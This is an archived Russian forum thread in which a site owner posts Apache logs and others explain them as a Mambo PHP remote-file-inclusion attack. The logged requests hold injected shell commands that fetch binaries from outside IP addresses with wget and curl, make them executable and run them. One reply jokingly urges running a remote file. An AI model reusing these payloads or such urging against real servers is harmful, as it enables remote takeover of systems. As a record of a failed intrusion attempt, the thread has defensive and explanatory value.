PDA

Просмотр полной версии : Объясните логи апач сервера

andre
03.04.2006, 21:52
Обнаружил у себя в логах такие вот записи

24.20.104.181 - - [03/Apr/2006:20:46:46 +0400] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 404 296

24.20.104.181 - - [03/Apr/2006:20:46:48 +0400] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 200 42194

24.20.104.181 - - [03/Apr/2006:20:46:50 +0400] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 404 302

объсните что пытались сделать?
m0nzt3r
03.04.2006, 21:55
пытались ломануть =)
Utochka
03.04.2006, 21:57
Пытались выполнить команды и залить шелл. Это php инклудинг!
FQziT
03.04.2006, 21:57
лол, самому сложно понять, что пытались сделать?
k1b0rg
03.04.2006, 21:57
пытались поломать твою мамбу с помощью php инклуда
1 и 3 страница не существует, на второй не работает адреса загрузки
fucker"ok
03.04.2006, 21:57
Это новая фишка в apache. Называется "вселенский разум". Теперь apache сам скачивает то что ему надо и откуда над.
Это как-раз видно по логам, wget фигурирует.


зы
тебя похачили.
max_pain89
03.04.2006, 21:58
пытались залить тебе сплойт
virgoz
03.04.2006, 22:11
Помоги ребятам, запусти этот файлик _http://72.34.42.241/~dancing/bash :))
Allen
03.04.2006, 22:24
У тебя мамба целая?
А то её собирались ломнуть.
GreenBear
03.04.2006, 22:40
сколько человек еще скажет, что его пытались ломануть?
делаем ставки господа!
andre
03.04.2006, 22:46
пасибо за разъяснения

У тебя мамба целая?
А то её собирались ломнуть.

что такое мамба? эт типо движок на пхп или...., нет у меня его(или ее)...

интересно кому я сдался, в логе еще парочка таких обращения и все к несуществующим папкам и файлам, они что на шару пытались найти скрипты...

phpgroupware
wordpress
drupal
/xmlrpc.php
/xmlsrv/xmlrpc.php
(ничего из этого у меня не стоит и не было никогда)